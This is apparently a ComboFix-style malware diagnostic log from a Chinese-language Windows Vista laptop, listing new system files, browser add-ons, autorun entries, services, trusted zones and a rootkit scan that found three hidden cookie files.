2014-07-22 03:01 . 2014-07-22 03:01 130048 ----a-w- c:\windows\system32\drivers\drmk.sys
2014-07-22 03:01 . 2008-01-21 02:23 1304064 ----a-w- c:\windows\system32\WMALFXGFXDSP.dll
2014-07-22 03:01 . 2014-07-22 03:01 158208 ----a-w- c:\windows\system32\imagehlp.dll
2014-07-22 03:01 . 2014-07-22 03:01 36864 ----a-w- c:\windows\system32\wshcon.dll
2014-07-22 03:01 . 2014-07-22 03:01 172032 ----a-w- c:\windows\system32\scrrun.dll
2014-07-22 03:01 . 2014-07-22 03:01 155648 ----a-w- c:\windows\system32\wscript.exe
2014-07-22 03:01 . 2014-07-22 03:01 135168 ----a-w- c:\windows\system32\cscript.exe
2014-07-22 03:01 . 2014-07-22 03:01 131072 ----a-w- c:\windows\system32\wshom.ocx
2014-07-22 03:00 . 2014-07-22 03:00 596480 ----a-w- c:\windows\system32\FWPUCLNT.DLL
2014-07-22 03:00 . 2014-07-22 03:00 444928 ----a-w- c:\windows\system32\IKEEXT.DLL
2014-07-22 03:00 . 2014-07-22 03:00 993792 ----a-w- c:\windows\system32\crypt32.dll
2014-07-22 03:00 . 2014-07-22 03:00 297984 ----a-w- c:\windows\system32\gdi32.dll
2014-07-22 02:59 . 2014-07-22 02:59 24576 ----a-w- c:\windows\system32\cryptdlg.dll
2014-07-22 02:59 . 2014-07-22 02:59 102608 ----a-w- c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-07-22 02:58 . 2014-07-22 02:58 25472 ----a-w- c:\windows\system32\drivers\hidparse.sys
2014-07-22 02:58 . 2014-07-22 02:58 73216 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-07-22 02:58 . 2014-07-22 02:58 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-07-22 02:58 . 2014-07-22 02:58 39936 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-07-22 02:58 . 2014-07-22 02:58 23552 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-07-22 02:58 . 2014-07-22 02:58 226304 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-07-22 02:58 . 2014-07-22 02:58 197632 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-07-22 02:58 . 2008-01-21 02:23 15872 ----a-w- c:\windows\system32\hcrstco.dll
2014-07-22 02:58 . 2006-11-02 08:55 8704 ----a-w- c:\windows\system32\hccoin.dll
2014-07-22 02:58 . 2014-07-22 02:58 532480 ----a-w- c:\windows\system32\comctl32.dll
2014-07-22 02:57 . 2014-07-22 02:57 527064 ----a-w- c:\windows\system32\drivers\Wdf01000.sys
2014-07-22 02:57 . 2014-07-22 02:57 134272 ----a-w- c:\windows\system32\drivers\usbvideo.sys
2014-07-22 02:57 . 2014-07-22 02:57 798208 ----a-w- c:\windows\system32\FntCache.dll
2014-07-22 02:57 . 2014-07-22 02:57 683008 ----a-w- c:\windows\system32\d2d1.dll
2014-07-22 02:57 . 2014-07-22 02:57 486400 ----a-w- c:\windows\system32\d3d10level9.dll
2014-07-22 02:57 . 2014-07-22 02:57 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-07-22 02:57 . 2014-07-22 02:57 189952 ----a-w- c:\windows\system32\d3d10core.dll
2014-07-22 02:57 . 2014-07-22 02:57 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2014-07-22 02:57 . 2014-07-22 02:57 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2014-07-22 02:57 . 2014-07-22 02:57 1069056 ----a-w- c:\windows\system32\DWrite.dll
2014-07-22 02:57 . 2014-07-22 02:57 1029120 ----a-w- c:\windows\system32\d3d10.dll
2014-07-22 02:57 . 2014-07-22 02:57 34304 ----a-w- c:\windows\system32\atmlib.dll
2014-07-22 02:57 . 2014-07-22 02:57 293376 ----a-w- c:\windows\system32\atmfd.dll
2014-07-22 02:57 . 2014-07-22 02:57 615936 ----a-w- c:\windows\system32\themeui.dll
2014-07-22 02:57 . 2014-07-22 02:57 1548288 ----a-w- c:\windows\system32\WMVDECOD.DLL
2014-07-22 02:56 . 2014-07-22 02:56 49152 ----a-w- c:\windows\system32\csrsrv.dll
2014-07-22 02:56 . 2014-07-22 02:56 1205168 ----a-w- c:\windows\system32\ntdll.dll
2014-07-22 02:56 . 2014-07-22 02:56 64000 ----a-w- c:\windows\system32\smss.exe
2014-07-22 02:56 . 2014-07-22 02:56 3603904 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-07-22 02:56 . 2014-07-22 02:56 3551680 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-07-22 02:56 . 2014-07-22 02:56 24064 ----a-w- c:\windows\system32\drivers\tssecsrv.sys
2014-07-22 02:56 . 2014-07-22 02:56 15872 ----a-w- c:\windows\system32\icaapi.dll
2014-07-22 02:56 . 2014-07-22 02:56 783360 ----a-w- c:\windows\system32\rpcrt4.dll
2014-07-22 02:55 . 2014-07-22 02:55 98304 ----a-w- c:\windows\system32\cryptnet.dll
2014-07-22 02:55 . 2014-07-22 02:55 172544 ----a-w- c:\windows\system32\wintrust.dll
2014-07-22 02:55 . 2014-07-22 02:55 133120 ----a-w- c:\windows\system32\cryptsvc.dll
2014-07-22 02:54 . 2014-07-22 02:54 812544 ----a-w- c:\windows\system32\certutil.exe
2014-07-22 02:54 . 2014-07-22 02:54 41984 ----a-w- c:\windows\system32\certenc.dll
2014-07-22 02:53 . 2014-07-22 02:53 443904 ----a-w- c:\windows\system32\win32spl.dll
2014-07-22 02:53 . 2014-07-22 02:53 37376 ----a-w- c:\windows\system32\printcom.dll
2014-07-22 02:53 . 2014-07-22 02:53 1082232 ----a-w- c:\windows\system32\drivers\ntfs.sys
2014-07-22 02:53 . 2014-07-22 02:53 36864 ----a-w- c:\windows\system32\tsgqec.dll
2014-07-22 02:53 . 2014-07-22 02:53 2691072 ----a-w- c:\windows\system32\mstscax.dll
2014-07-22 02:53 . 2014-07-22 02:53 131072 ----a-w- c:\windows\system32\aaclient.dll
2014-07-22 02:53 . 2014-07-22 02:53 376320 ----a-w- c:\windows\system32\winsrv.dll
2014-07-22 02:52 . 2014-07-22 02:52 2560 ----a-w- c:\windows\system32\drivers\zh-CN\wdf01000.sys.mui
2014-07-22 02:52 . 2014-07-22 02:52 9728 ----a-w- c:\windows\system32\Wdfres.dll
2014-07-22 02:52 . 2014-07-22 02:52 47720 ----a-w- c:\windows\system32\drivers\WdfLdr.sys
2014-07-22 02:52 . 2014-07-22 02:52 16896 ----a-w- c:\windows\system32\winusb.dll
2014-07-22 02:52 . 2014-07-22 02:52 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-07-22 02:52 . 2014-07-22 02:52 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
2014-07-22 02:52 . 2014-07-22 02:52 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-07-22 02:52 . 2014-07-22 02:52 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-07-22 02:52 . 2014-07-22 02:52 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-07-22 02:52 . 2014-07-22 02:52 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-07-22 02:52 . 2014-07-22 02:52 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-07-22 02:49 . 2014-07-22 02:49 347136 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-07-22 02:49 . 2014-07-22 02:49 332288 ----a-w- c:\windows\system32\msdrm.dll
2014-07-22 02:49 . 2014-07-22 02:49 152576 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-07-22 02:49 . 2014-07-22 02:49 152064 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-07-22 02:49 . 2014-07-22 02:49 526336 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-07-22 02:49 . 2014-07-22 02:49 518144 ----a-w- c:\windows\system32\RMActivate.exe
2014-07-22 02:49 . 2014-07-22 02:49 471552 ----a-w- c:\windows\system32\secproc_isv.dll
2014-07-22 02:49 . 2014-07-22 02:49 471552 ----a-w- c:\windows\system32\secproc.dll
2014-07-22 02:49 . 2014-07-22 02:49 346624 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-07-22 00:56 . 2014-07-22 00:56 245760 ----a-w- c:\windows\system32\uninst_saver.exe
2014-07-20 18:44 . 2014-07-20 18:44 83304 ----a-w- c:\windows\system32\drivers\ksapi.sys
2014-07-20 18:44 . 2014-07-20 18:44 27240 ----a-w- c:\windows\system32\drivers\KavBootC.sys
2014-07-14 13:22 . 2012-12-15 05:18 97648 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2014-07-02 16:07 . 2014-07-21 01:39 358984 ----a-w- c:\windows\system32\drivers\Lsmon.sys
2014-07-02 16:07 . 2014-07-21 01:39 358984 ----a-w- c:\windows\system32\drivers\Drmon.sys
.
.
(((((((((((((((((((((((((((((((((((((   Ҫ   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*ע* հϷȱʡ¼ᱻʾ 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{00000ADA-7E0D-47C1-986C-F017D09C4304}]
2014-01-13 18:43 1037192 ----a-w- c:\users\Public\Thunder Network\XMP4\Addins\VideoUrlSniffer.2.2.1.150.(415).dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{0A0DDBD3-6641-40B9-873F-BBDD26D6C14E}]
2010-06-24 11:13 143360 ----a-w- q:\program files\easyMule\modules\IE2EM.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{0F4BF955-A127-41B7-A998-369904AA2578}]
2014-04-16 10:23 126792 ----a-w- q:\program files\360\360sd\360sdbho.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814}]
2014-07-21 23:56 752960 ----a-w- q:\program files\IObit\IObit Uninstaller\UninstallExplorer32.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{43BEAFD9-E005-483D-A367-146BA6C8A32E}]
2010-04-19 22:08 312896 ----a-w- q:\program files\Tudou\Tudou\tudouDetector.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{658D2C4F-158A-46FB-8C96-B1C8F56DBBE9}]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{DDD362CF-523B-4BC9-8FDC-58F93B6BC945}]
2014-08-19 03:19 462392 ----a-w- c:\users\THINK\AppData\Roaming\Tencent\QQ\QQAntiPhishing\AccountProtect.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{DE05CF4A-7B0A-4775-B5E5-396244938679}]
2013-11-14 07:34 1857992 ----a-w- q:\program files\Thunder Network\Thunder\Thunder BHO Platform\np_tdieplat.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\..Walkbox_Overlayicon_ReqSync]
@="{7C4D429D-6880-4C91-AD69-6FB67DD4D4DB}"
[HKEY_CLASSES_ROOT\CLSID\{7C4D429D-6880-4C91-AD69-6FB67DD4D4DB}]
2011-01-13 11:34 1181424 ----a-w- c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\..Walkbox_Overlayicon_Synced]
@="{4F2FE7FB-CD8B-4891-BB16-94CCBC2D968F}"
[HKEY_CLASSES_ROOT\CLSID\{4F2FE7FB-CD8B-4891-BB16-94CCBC2D968F}]
2011-01-13 11:34 1181424 ----a-w- c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\..Walkbox_Overlayicon_Syning]
@="{D04A1EC4-9683-44B0-87BC-7B86A1BB81AA}"
[HKEY_CLASSES_ROOT\CLSID\{D04A1EC4-9683-44B0-87BC-7B86A1BB81AA}]
2011-01-13 11:34 1181424 ----a-w- c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\360FileGuardAntiDel]
@="{130DA40A-D640-44D7-9CC6-FAA1CD6B3DEA}"
[HKEY_CLASSES_ROOT\CLSID\{130DA40A-D640-44D7-9CC6-FAA1CD6B3DEA}]
2014-05-28 02:56 175944 ----a-w- q:\program files\360\360sd\ShellIco.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\AAADesktopTips]
@="{4562B511-62E9-4533-B7B2-56A8BB10B482}"
[HKEY_CLASSES_ROOT\CLSID\{4562B511-62E9-4533-B7B2-56A8BB10B482}]
2013-11-06 02:56 264584 ----a-w- c:\users\Public\Thunder Network\KanKan\reghelper\xappex.1.1.1.73.(426).dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\QVODOverlayIcon]
@="{237A913F-9059-4E00-8C29-624C3C015013}"
[HKEY_CLASSES_ROOT\CLSID\{237A913F-9059-4E00-8C29-624C3C015013}]
2013-04-22 07:37 143984 ----a-w- c:\program files\QMovie\QVODShellIcon.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Acrobat Synchronizer"="q:\program files\Adobe.Acrobat.X.Pro\Acrobat\AdobeCollabSync.exe" [2010-11-16 1216416]
"360sd"="q:\program files\360\360sd\360sdrun.exe" [2014-05-28 832840]
"Grid Service"="c:\program files\GridService\peer.exe" [2008-12-30 4993024]
"ImeGuardCom"="q:\program files\SogouInput\6.1.0.6700\SogouInput\Components\AddressSearch\1.0.0.1255\SGImeGuard.exe" [2013-11-28 347256]
"HP Officejet Pro 8600 (NET)"="c:\program files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe" [2012-10-17 1837672]
"renrenservice"="c:\users\THINK\AppData\Roaming\renren.com\RenRenService.exe" [2012-12-28 1185632]
"ctfmon"="c:\windows\system32\ctfmon.exe" [2006-11-02 8704]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2014-07-23 751184]
.
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
īˮ - HP Officejet Pro 8600 ().lnk - c:\windows\system32\RunDll32.exe "c:\program files\HP\HP Officejet Pro 8600\bin\HPStatusBL.dll",RunDLLEntry SERIALNUMBER=CN346BWGWV05KC;CONNECTION=NW;MONITOR=1; [2006-11-2 44544]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\ThinkPad\Bluetooth Software\BTTray.exe [2011-1-24 804128]
STK02N 2.3 PNP Monitor.lnk - c:\windows\STK02N\STK02NM.exe [2011-12-12 163840]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"PromptOnSecureDesktop"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"EnableShellExecuteHooks"= 1 (0x1)
"OldEnableShellExecuteHooks"= 1 (0x1)
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"AlwaysShowClassicMenu"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk *\0OODBS
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages REG_MULTI_SZ   scecli ACGina
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\keyboard layouts\e0210804]
   Ime File REG_SZ         SOGOUPY.IME
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Conew Rescue Service]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^PPTV.lnk]
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^īˮ - .lnk]
path=c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\īˮ - .lnk
backup=c:\windows\pss\īˮ - .lnk.Startup
backupExtension=.Startup
.
[HKLM\~\startupfolder\C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^īˮ - HP Officejet Pro 8600 ().lnk]
path=c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\īˮ - HP Officejet Pro 8600 ().lnk
backup=c:\windows\pss\īˮ - HP Officejet Pro 8600 ().lnk.Startup
backupExtension=.Startup
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Officejet Pro 8600 (NET)
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QvodTerminal
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2013-04-22 01:43 59720 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Creative SB Monitoring Utility]
2010-01-12 06:04 98816 ----a-w- c:\windows\System32\SBAVMon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2013-05-31 15:56 152392 ----a-w- q:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\renrenservice]
2012-12-28 19:30 1185632 ----a-w- c:\users\THINK\AppData\Roaming\renren.com\RenRenService.exe
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"ABBYY Screenshot Reader Bonus"="c:\program files\ABBYY FineReader 9.0 Sprint\Bonus.ScreenshotReader.exe" -autorun
"renrenservice"="c:\users\THINK\AppData\Roaming\renren.com\RenRenService.exe" /background
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"MaxMenuMgr"="c:\program files\Seagate\SeagateManager\FreeAgent Status\StxMenuMgr.exe"
"VolPanel"="q:\program files\Creative\USB Sound Blaster HD\Volume Panel\VolPanlu.exe" /r
"EEventManager"="c:\program files\Epson Software\Event Manager\EEventManager.exe"
"APSDaemon"=
"xbupdater"="c:\program files\Tao123\1\xbUpdater.exe"
"UnlockerAssistant"="q:\program files\Unlocker\UnlockerAssistant.exe"
"HP Software Update"=c:\program files\Hp\HP Software Update\HPWuSchd2.exe
"BeatTrojanWall"=q:\program files\ľʦ2012ȫװ\ľʦǽ2012\BeatTrojanWall.exe
"Creative SB Monitoring Utility"=RunDll32 sbavmon.dll,SBAVMonitor
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Svc\S-1-5-21-55330172-1766457534-1491637609-1000]
"EnableNotificationsRef"=dword:00000001
.
R2 360rp;360 ɱʵʱط;q:\program files\360\360sd\360rps.exe [2014-05-28 251208]
R3 360AvFlt;360AvFlt mini-filter driver;c:\windows\system32\DRIVERS\360AvFlt.sys [2014-04-23 65608]
R3 AdvancedSystemCareService7;Advanced SystemCare Service 7;q:\program files\IObit\Advanced SystemCare 7\ASCService.exe [2014-01-14 881952]
R4 ADMonitor;AD Monitor;c:\windows\system32\ADMonitor.exe [2009-03-18 106496]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceNoNetwork REG_MULTI_SZ   PLA DPS BFE mpssvc
bthsvcs REG_MULTI_SZ   BthServ
DoctorService REG_MULTI_SZ   XLDoctor Service
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
XLServicePlatform REG_MULTI_SZ   XLServicePlatform
PPTVServiceGroup REG_MULTI_SZ   PPTVService
xbplussvc REG_MULTI_SZ   XiaobaiPlusSvc
bdx REG_MULTI_SZ   scan sysagent
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{10880D85-AAD9-4558-ABDC-2AB1552D831F}]
2007-10-18 07:25 451872 ----a-w- c:\program files\Common Files\LightScribe\LSRunOnce.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-07-22 04:10 1104200 ----a-w- c:\program files\Google\Chrome\Application\36.0.1985.125\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-13 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-05 22:56]
.
2014-07-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-12-07 04:55]
.
2014-07-15 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-12-07 04:55]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.6655.com/vista.html
mStart Page = about:blank
uInternet Settings,ProxyOverride = local
IE: &Uʹزղ - q:\program files\NamiRobot\Data\du.html
IE: &ʹ&Ѹ - q:\program files\Thunder Network\Thunder\BHO\\GetUrl.htm
IE: &ʹ&Ѹȫ - q:\program files\Thunder Network\Thunder\BHO\\GetAllUrl.htm
IE: &ʹ&Ѹ - q:\program files\Thunder Network\Thunder\BHO\OfflineDownload.htm
IE: &ʹ115ŵ - q:\program files\115\UDown\getUrl.htm
IE: &ʹ115ŵȫ - q:\program files\115\UDown\getAllUrl.htm
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: ʹ(&X) - q:\program files\Tencent\QQDownload\xfgeturl.htm
IE: ʹȫ(&Q) - q:\program files\Tencent\QQDownload\xfgetAllurl.htm
IE: ʹ缫(ԱȨ)(&J) - q:\program files\Tencent\QQDownload\xftopspeed.htm
IE: ʹõ¿ - q:\program files\easyMule\IE2EM.htm
IE: ʹѸ׿ - c:\users\Public\Thunder Network\XMP4\Core\Program\XmpIEMenu.htm
IE: 浽ռ(ԱȨ)(&K) - q:\program files\Tencent\QQDownload\xfofflineonly.htm
IE: ͼ͵ Bluetooth 豸(&B)... - c:\program files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm
IE: Microsoft Excel(&X) - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
IE: Microsoft Office Excel(&X) - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
IE: ҳ淢͵ Bluetooth 豸(&B)... - c:\program files\ThinkPad\Bluetooth Software\btsendto_ie.htm
IE: {{14c1d00e-0b92-4379-880b-444fa2d740dd} - c:\users\Public\Thunder Network\XMP4\Core\Program\XmpIEToolMenu.htm
IE: {{24c1d00e-0b92-4379-880b-444fa2d740dd} - c:\users\Public\Thunder Network\XMP4\Core\Program\XmpIEToolBar.htm
IE: {{548BF84E-9665-47f9-B635-7380F8943E90}
IE: {{5D578929-E74E-46A2-A810-4F33D011DC52} - c:\program files\Common Files\Thunder Network\Kankan\XLStartKankan.exe
Trusted Zone: 255.148\202.96
Trusted Zone: alipay.com
Trusted Zone: alisoft.com
Trusted Zone: bankofchina.com
Trusted Zone: boc.cn
Trusted Zone: ccb.cn\b2b
Trusted Zone: ccb.com\www
Trusted Zone: ccb.com.cn\*
Trusted Zone: ccb.com.cn\ca2
Trusted Zone: ccb.com.cn\ca3
Trusted Zone: ccb.com.cn\ibsbjstar
Trusted Zone: ccb.com.cn\mybank
Trusted Zone: nbcb.com.cn\*
Trusted Zone: nbcb.com.cn\corporbank
Trusted Zone: nbcb.com.cn\www
Trusted Zone: online.unionpay.com
Trusted Zone: securitycenter.alipay.com
Trusted Zone: taobao.com
Trusted Zone: unionpaysecure.com
Trusted Zone: alipay.com
Trusted Zone: alisoft.com
Trusted Zone: taobao.com
TCP: DhcpNameServer = 167.206.112.138 167.206.7.4 167.206.3.168
Handler: KuGoo - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\progra~1\KuGou7\KUGOO3~1.OCX
Handler: KuGoo3 - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\progra~1\KuGou7\KUGOO3~1.OCX
DPF: HighSpeedDownloadIE - hxxp://st2.dbank.com/netdisk/plugin/1011/DBank_downloadplugin.CAB
DPF: {2B24B8F5-8FAD-4933-8E6C-3CAAEEA4D217} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
DPF: {45D2E7C0-B894-43CE-B64E-F210DBEC8C94} - hxxp://www.activextest.com/activex/ActiveXScanner.CAB
DPF: {816BE035-1450-40D0-8A3B-BA7825A83A77} - hxxp://support.lenovo.com/Resources/Lenovo/AutoDetect/Lenovo_AutoDetect2.cab
DPF: {9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86} - hxxp://think.lenovo.com.cn/ThinkEDriver/cab/npdueng.cab
DPF: {BBF51028-5890-4817-A2C4-5F3CFCEBD7EF} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
.
.
------- File Associations -------
.
txtfile=c:\windows\notepad.exe %1
.
- - - - ORPHANS REMOVED - - - -
.
ShellIconOverlayIdentifiers-{486C8576-C2C5-42AD-87C6-5E9681633935} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{683617F1-0DD4-4B24-B87F-73CE23B8440C} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{6B3CB227-0A30-418E-A673-FF1F142D9327} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{B2AF7140-40A1-449E-82B9-2C0876C97AF4} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{F3E9E0C3-F30E-4EB1-9926-A5DA9DC2F68D} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
SafeBoot-WudfPf
SafeBoot-WudfRd
MSConfigStartUp-Google Update - c:\users\THINK\AppData\Local\Google\Update\GoogleUpdate.exe
AddRemove-Ͻͷȫ - f:\Ͻͷȫ\uninst.exe
AddRemove-ʽV2.0 - c:\windows\iun6002.exe
AddRemove-hao123desk - c:\users\THINK\AppData\Roaming\baidu\hao123\hao123.1.0.0.1097.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-09-14 16:22
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
.
c:\users\THINK\AppData\Local\Temp\828\AppData\Roaming\Microsoft\Windows\Cookies\1HJM9B6G.txt 980 bytes
c:\users\THINK\AppData\Local\Temp\828\AppData\Roaming\Microsoft\Windows\Cookies\W7QR8019.txt 1578 bytes
c:\users\THINK\AppData\Local\Temp\918\AppData\Roaming\Microsoft\Windows\Cookies\W6VD64QC.txt 585 bytes
.
scan completed successfully
hidden files: 3
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet006\Services\{1BA31E5A-C098-42d8-8F88-3C9F78A2FDDC}]
"ImagePath"="\??\q:\program files\CyberLink\PowerDVD10\PowerDVD10\NavFilter\000.fcl"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
